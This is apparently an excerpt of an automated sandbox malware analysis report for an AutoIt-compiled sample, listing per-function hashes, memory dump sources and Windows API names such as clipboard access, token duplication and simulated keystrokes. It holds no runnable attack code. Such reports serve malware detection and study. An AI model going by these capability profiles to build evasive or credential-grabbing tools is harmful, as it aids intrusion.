                                                                      • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                      • Instruction Fuzzy Hash: 24F03A52A89A0582EF19FF65C0553386364BB58F58F940930DA0E8A389EF6CE49483A1
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C0E74C5C
                                                                        • Part of subcall function 00007FF7C0E75600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C0E75609
                                                                        • Part of subcall function 00007FF7C0E75600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7C0E7561A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                      • String ID:
                                                                      • API String ID: 1680350287-0
                                                                      • Opcode ID: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                      • Instruction ID: 068e152234954b9679af13af992adb6e3e200840e252821551866ca7f8649543
                                                                      • Opcode Fuzzy Hash: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                      • Instruction Fuzzy Hash: 5CE09291E9A50B45F96ABDA9254A078D1400F59370EE81B30D93DC53D2AF5CB45191B1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                      • Instruction ID: 0237085101800138515761ced6d9a282961338840e8e539b1feec7f0927c727b
                                                                      • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                      • Instruction Fuzzy Hash: A1E03922608B9182D720DF06F44031AE370FB89BD8F944525EF8C47B19CF7DD5918B80
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath
                                                                      • String ID:
                                                                      • API String ID: 82841172-0
                                                                      • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                      • Instruction ID: 2fd37efcee1de11847a39e6b196684850436631e6f82de3dfca8b6c3f861fecc
                                                                      • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                      • Instruction Fuzzy Hash: 55E09222B0864581D721EB26E644399A362BB8CBD4F444031EE8C8375ACE6CD6C48A10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction ID: 6c4865ea24dc54b983eed03bcdf8f01047dc35f434071ff2cbe105288978df72
                                                                      • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction Fuzzy Hash: 73F05E2291DB8187E361AF94E404365BAA4F78471CF840035D58D86396CF3CE345CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Open_onexit
                                                                      • String ID:
                                                                      • API String ID: 3030063568-0
                                                                      • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                      • Instruction ID: effb9e907d24766f40bedd6fe77a596b735de9e8c84168a699c8f6bcf7e76740
                                                                      • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                      • Instruction Fuzzy Hash: 83E0ECA0F9A94B80EA18BFA9A8894749390AF95325FC45536C40DC6365DF2CF2A58760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentVersionWow64_onexit
                                                                      • String ID:
                                                                      • API String ID: 2932345936-0
                                                                      • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                      • Instruction ID: d28a992aa538f078f3f17e2d551903aa5649457f52903791227736d613937c16
                                                                      • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                      • Instruction Fuzzy Hash: C5C01210FE944B80E61C7FBD488A0F841905FE5320FD0017AC10DC0392DF0C71E64A71
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                      • Instruction ID: af8827cc3d4e087db21005b8baee8756ed4b562079a2bd89da6c42b8a99c8937
                                                                      • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                      • Instruction Fuzzy Hash: 22C01211FEA84B80E51C7FBE5C8B0B841905FA9320FD0057AC10DC0392CF1C72E64A71
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                      • Instruction ID: 12390106a2555f8d0a40041deddf06a81a11577f5dd98600a24f8ff9d9ae0534
                                                                      • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                      • Instruction Fuzzy Hash: EFC01210FD984B80E51C7FBE588A0B841905FA9330FD00936C00DC0392CF0C72E647A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                      • Instruction ID: 4f6bfc4ec3e9d5a4da633f974ce84b6305ba4a8d194c01e9085aa2c81d9855e3
                                                                      • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                      • Instruction Fuzzy Hash: 8E717C22B48A4285EB10FF66D1913FCA360FB44BA4F844532DE5E977A6DF38E545C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                      • Instruction ID: 589da43be74f1d4b7e677a06cf97617a88dc154069c27324936e6ede6e96a667
                                                                      • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                      • Instruction Fuzzy Hash: 12F0DA91A8D28645FE55BF695905679D2805F46BB0F884730D82EC53D2DF6CF48187B0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                      • Instruction ID: 4ff2d4733e124e00ed024d633dc6eb4a3c9bc2a0841cce7cd01f57e84c43cd0d
                                                                      • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                      • Instruction Fuzzy Hash: 4D22C636A08B4186E714EF25E85456EB7A0FB88BA8F904135DE4EC3B64DF7CE485C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                      • String ID: P
                                                                      • API String ID: 1208186926-3110715001
                                                                      • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                      • Instruction ID: 4464bb36d353c1f344639d08b71d12170bca003d29aa0f1e7ad7315c8430d705
                                                                      • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                      • Instruction Fuzzy Hash: AE120772B0C6428AEB24AF25D4547BDABA1FB857A4FC04535DA4A87B90CF7CF480C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-2439800395
                                                                      • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                      • Instruction ID: ae72f8a307d905031c43959e749482d61cec986558ce19f2b29e497537801f07
                                                                      • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                      • Instruction Fuzzy Hash: C1E1757660C74186E714EF65E84466AB7A0FB88BA8F904135DF4E83B64CF7CE485CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 3778422247-2988720461
                                                                      • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                      • Instruction ID: b4ef0ac4fe60cbc53d321482b2595c6741f6b103fafeb0e357b9f93a69059f71
                                                                      • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                      • Instruction Fuzzy Hash: 35415421B0C62243F7157F25A81863BB292BFC8FA5FD48031C90A97B54DF7DB88A4790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                      • String ID:
                                                                      • API String ID: 3372153169-0
                                                                      • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                      • Instruction ID: f5121b2c4b7276bca9fcf5626e2a9bc52bbeacedcdf3b3c56ab8f60e65420212
                                                                      • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                      • Instruction Fuzzy Hash: EC22AF32A49A8285EB64BF65D4546B9A3A1FF84FA4F944131CE1E87794DF3CF480C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                      • String ID: default$winsta0$winsta0\default
                                                                      • API String ID: 3202303201-1423368268
                                                                      • Opcode ID: b7d0b8b39f051f9df788fa98489ecf643cc29c02f39b668c8d2d326a2f0cf460
                                                                      • Instruction ID: 9f716f5da22ef9c2b238e3a2f68d86c585cc162d7521b99f4036654c5ef0c039
                                                                      • Opcode Fuzzy Hash: b7d0b8b39f051f9df788fa98489ecf643cc29c02f39b668c8d2d326a2f0cf460
                                                                      • Instruction Fuzzy Hash: 71A1A532B4DB4186EB10EF65E4442AAA3A1FB44BA8F844235DE5D87B98DF3CF045C794
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                      • Instruction ID: 82d7ccc152c8ed70e0560db36c4af4ad46f4380170a201160f1c4d6beb7d0cd0
                                                                      • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                      • Instruction Fuzzy Hash: 9CD15E32A08A568AE754FF78D8546AD77A1FB44B68F900535DA0E83BA4DF3CF484C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                      • String ID:
                                                                      • API String ID: 3222323430-0
                                                                      • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                      • Instruction ID: da52a8c4ccccebcfd44b10260308c47a5dfe004a3981374db9d0150bc1e3294c
                                                                      • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                      • Instruction Fuzzy Hash: 11717B22B4DA4682EB11BF11D45427DA361FF84BA8FC44435C94E837A2DF7CF68683A0
                                                                      APIs
